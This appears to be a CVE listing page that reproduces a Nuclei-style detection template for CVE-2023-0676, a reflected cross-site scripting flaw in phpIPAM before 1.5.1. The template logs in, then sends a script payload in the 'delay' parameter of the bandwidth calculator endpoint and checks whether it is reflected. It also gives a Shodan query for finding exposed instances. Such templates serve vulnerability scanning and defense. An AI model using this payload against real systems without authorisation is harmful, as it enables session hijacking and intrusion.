漏洞描述
Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.
CVE-2023-0676: phpIPAM 1.5.1 - Cross-site Scripting
PoC代码[已公开]
id: CVE-2023-0676
info:
name: phpIPAM 1.5.1 - Cross-site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.
impact: |
Allows attackers to execute malicious scripts in the context of a user's browser session.
remediation: |
Update phpipam/phpipam to the latest version to patch the vulnerability.
reference:
- https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b
- https://nvd.nist.gov/vuln/detail/CVE-2023-0676
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0676
cwe-id: CWE-79
epss-score: 0.00474
epss-percentile: 0.63926
cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:*
metadata:
vendor: phpipam
product: phpipam
shodan-query: html:"phpIPAM IP address management"
tags: cve,cve2023,phpipam,xss,authenticated,vuln
http:
- raw:
- |
POST /app/login/login_check.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ipamusername={{username}}&ipampassword={{password}}
- |
POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: {{BaseURL}}/phpipam/index.php?page=tools§ion=ip-calculator&subnetId=bw-calculator
wsize=50000&delay=<script>alert(document.domain)</script>&fsize=1024
matchers:
- type: dsl
dsl:
- contains(body_1, "Login successful")
- contains(body_2, "<script>alert(document.domain)</script>")
- contains(content_type_2, "text/html")
- status_code_2 == 200
condition: and
# digest: 4a0a00473045022023071e06c023a7dff04f4fd75124c7f24ac527654effd64378cdd63990f186dd022100a30b53f24a91df1a2c1495f45617120b2cd7c35a0c0dd653bcf614df6628281f:922c64590222798bb761d5b6d8e72950